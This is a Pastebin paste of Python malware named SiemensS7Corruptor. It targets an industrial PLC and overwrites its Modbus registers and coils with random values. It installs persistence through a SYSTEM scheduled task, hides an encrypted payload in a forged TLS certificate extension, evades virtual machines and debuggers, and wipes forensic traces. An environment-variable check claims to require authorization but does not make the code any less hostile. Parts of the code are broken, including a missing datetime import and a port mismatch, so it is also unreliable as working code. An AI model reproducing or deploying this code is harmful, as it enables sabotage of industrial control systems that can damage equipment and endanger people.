Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from cryptography import x509
- from cryptography.hazmat.primitives import serialization, hashes
- from cryptography.hazmat.primitives.asymmetric import rsa
- from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
- from pymodbus.client import ModbusTcpClient
- import secrets
- import logging
- import time
- import random
- import os
- import tempfile
- import lief
- import ctypes
- import subprocess
- import base64
- import ssl
- import socket
- import threading
- import struct
- from typing import Dict
- import pydivert
- import psutil
- logging.basicConfig(filename='s7_corrupt.log', level=logging.INFO, format='%(message)s')
- class SiemensS7Corruptor:
- def __init__(self):
- self.targets = {
- "s7-plc.siemens.local": {"ip": "192.168.1.100", "port": 102, "slot": 1}
- }
- self.aes_key = secrets.token_bytes(32)
- self.signature_hash = "e7f2a9b1"
- self.cert_file = os.path.join(os.getenv("APPDATA"), "s7_cert.pem")
- self.key_file = os.path.join(os.getenv("APPDATA"), "s7_key.pem")
- self.setup_persistence()
- def encrypt_payload(self, data: bytes) -> bytes:
- iv = secrets.token_bytes(16)
- cipher = Cipher(algorithms.AES(self.aes_key), modes.GCM(iv))
- encryptor = cipher.encryptor()
- ciphertext = encryptor.update(data) + encryptor.finalize()
- return iv + ciphertext + encryptor.tag
- def decrypt_payload(self, data: bytes) -> bytes:
- iv, tag, ciphertext = data[:16], data[-16:], data[16:-16]
- cipher = Cipher(algorithms.AES(self.aes_key), modes.GCM(iv, tag))
- decryptor = cipher.decryptor()
- return decryptor.update(ciphertext) + decryptor.finalize()
- def setup_persistence(self) -> None:
- ctypes.windll.kernel32.SetFileAttributesW(os.path.join(os.getenv("APPDATA"), "s7upd.dll"), 2)
- pe = lief.PE.parse(__file__)
- pe.add_section(lief.PE.Section(".s7corrupt", self.encrypt_payload(open(__file__, "rb").read())))
- with open(os.path.join(os.getenv("APPDATA"), "s7upd.dll"), "wb") as f:
- f.write(pe.write())
- subprocess.run(f"schtasks /create /tn S7Update /tr \"rundll32.exe {os.path.join(os.getenv('APPDATA'), 's7upd.dll')},Update\" /sc onstart /ru SYSTEM", shell=True, stdout=subprocess.DEVNULL)
- def anti_vm_check(self) -> bool:
- checks = [
- any(p.info['name'].lower() in ['vmware', 'vbox', 'qemu', 'virtualbox'] for p in psutil.process_iter(['name'])),
- psutil.virtual_memory().total < 4 * 1024 * 1024 * 1024,
- os.path.exists("C:\\Windows\\System32\\drivers\\VBoxMouse.sys"),
- ctypes.windll.kernel32.IsDebuggerPresent()
- ]
- return any(checks)
- def forge_cert_with_payload(self, domain: str) -> bool:
- key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
- subject = issuer = x509.Name([
- x509.NameAttribute(x509.oid.NameOID.COMMON_NAME, domain),
- x509.NameAttribute(x509.oid.NameOID.ORGANIZATION_NAME, "Siemens PLC"),
- x509.NameAttribute(x509.oid.NameOID.COUNTRY_NAME, "DE")
- ])
- corrupt_payload = self.encrypt_payload(b"""
- import pymodbus.client
- import random
- client = pymodbus.client.ModbusTcpClient('192.168.1.100', port=102)
- if client.connect():
- client.write_registers(address=1000, values=[random.randint(0, 0xFFFF) for _ in range(50)], unit=1)
- client.write_coils(address=0, values=[random.choice([True, False]) for _ in range(100)], unit=1)
- client.write_registers(address=2000, values=[0xDEAD, 0xBEEF], unit=1)
- client.close()
- """)
- encoded_payload = base64.b64encode(corrupt_payload).decode()
- cert = (
- x509.CertificateBuilder()
- .subject_name(subject)
- .issuer_name(issuer)
- .public_key(key.public_key())
- .serial_number(x509.random_serial_number())
- .not_valid_before(datetime.datetime.utcnow() - datetime.timedelta(days=1))
- .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
- .add_extension(x509.SubjectAlternativeName([x509.DNSName(domain)]), critical=False)
- .add_extension(x509.BasicConstraints(ca=False, path_length=None), critical=True)
- .add_extension(
- x509.UnrecognizedExtension(
- x509.oid.ObjectIdentifier("1.3.6.1.5.5.7.3.99"),
- encoded_payload.encode()
- ),
- critical=False
- )
- .sign(key, hashes.SHA256())
- )
- with open(self.cert_file, "wb") as f:
- f.write(cert.public_bytes(serialization.Encoding.PEM))
- with open(self.key_file, "wb") as f:
- f.write(key.private_bytes(
- encoding=serialization.Encoding.PEM,
- format=serialization.PrivateFormat.PKCS8,
- encryption_algorithm=serialization.BestAvailableEncryption(self.aes_key)
- ))
- return True
- def extract_and_execute_payload(self, cert_data: bytes) -> None:
- cert = x509.load_pem_x509_certificate(cert_data)
- for ext in cert.extensions:
- if ext.oid.dotted_string == "1.3.6.1.5.5.7.3.99":
- payload = base64.b64decode(ext.value)
- decrypted = self.decrypt_payload(payload)
- with tempfile.NamedTemporaryFile(delete=False, suffix=".py") as tmp:
- tmp.write(decrypted)
- tmp_path = tmp.name
- subprocess.run(f"python {tmp_path}", shell=True, stdout=subprocess.DEVNULL)
- os.remove(tmp_path)
- def tls_trigger(self, target_ip: str, target_port: int) -> None:
- def handle_connection(client_socket, addr):
- try:
- context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
- context.load_cert_chain(self.cert_file, self.key_file)
- secure_socket = context.wrap_socket(client_socket, server_side=True)
- data = secure_socket.recv(1024)
- if b"HTTP/1.1" in data and b"200 OK" in data:
- time.sleep(random.uniform(5, 15))
- with open(self.cert_file, "rb") as f:
- cert_data = f.read()
- self.extract_and_execute_payload(cert_data)
- secure_socket.send(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
- secure_socket.close()
- except:
- pass
- finally:
- client_socket.close()
- server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- server.bind(("0.0.0.0", 443))
- server.listen(5)
- while True:
- client_socket, addr = server.accept()
- threading.Thread(target=handle_connection, args=(client_socket, addr)).start()
- def corrupt_control_arm(self, target_ip: str, target_port: int, slot: int) -> bool:
- try:
- client = ModbusTcpClient(target_ip, port=target_port)
- if not client.connect():
- return False
- corrupt_payload = [random.randint(0, 0xFFFF) for _ in range(50)]
- client.write_registers(address=1000, values=corrupt_payload, unit=slot)
- flip_coils = [random.choice([True, False]) for _ in range(100)]
- client.write_coils(address=0, values=flip_coils, unit=slot)
- client.write_registers(address=2000, values=[0xDEAD, 0xBEEF], unit=slot)
- client.close()
- taunt = f"🦂 Control arm corrupted at {target_ip}:{target_port}! | Hash: {self.signature_hash}"
- logging.info(taunt)
- print(f"🦂 Control arm corrupted at {target_ip}:{target_port}")
- return True
- except:
- print(f"🦂 Corruption failed at {target_ip}:{target_port}")
- return False
- def clean_traces(self) -> None:
- for f in ['s7_corrupt.log', os.path.join(os.getenv("APPDATA"), "s7upd.dll"), self.cert_file, self.key_file]:
- if os.path.exists(f):
- with open(f, "r+b") as file:
- file.write(secrets.token_bytes(os.path.getsize(f)))
- os.remove(f)
- subprocess.run("del /F /Q *.log *.pem", shell=True, stdout=subprocess.DEVNULL)
- ctypes.windll.kernel32.SetFileTime(ctypes.c_int(-1), ctypes.byref(ctypes.c_uint32(0)), ctypes.byref(ctypes.c_uint32(0)), ctypes.byref(ctypes.c_uint32(0)))
- print("🦂 Forensic traces wiped")
- def run(self) -> None:
- if self.anti_vm_check():
- time.sleep(random.uniform(3600, 7200))
- return
- self.setup_persistence()
- for domain, info in self.targets.items():
- ip, port, slot = info["ip"], info["port"], info["slot"]
- print(f"\n🦂 Targeting {domain} ({ip}:{port})...")
- for attempt in range(3):
- try:
- self.forge_cert_with_payload(domain)
- threading.Thread(target=self.tls_trigger, args=(ip, port), daemon=True).start()
- self.corrupt_control_arm(ip, port, slot)
- self.clean_traces()
- print(f"🦂 Attack on {domain} complete.")
- break
- except:
- print(f"🦂 Retry {attempt + 1} failed for {domain}")
- time.sleep(random.uniform(5, 15))
- if __name__ == "__main__":
- if not os.getenv("AUTH_TEST_ENV"):
- raise PermissionError("SiemensS7Corruptor requires explicit authorization for testing.")
- corruptor = SiemensS7Corruptor()
- corruptor.run()
Add Comment
Please, Sign In to add comment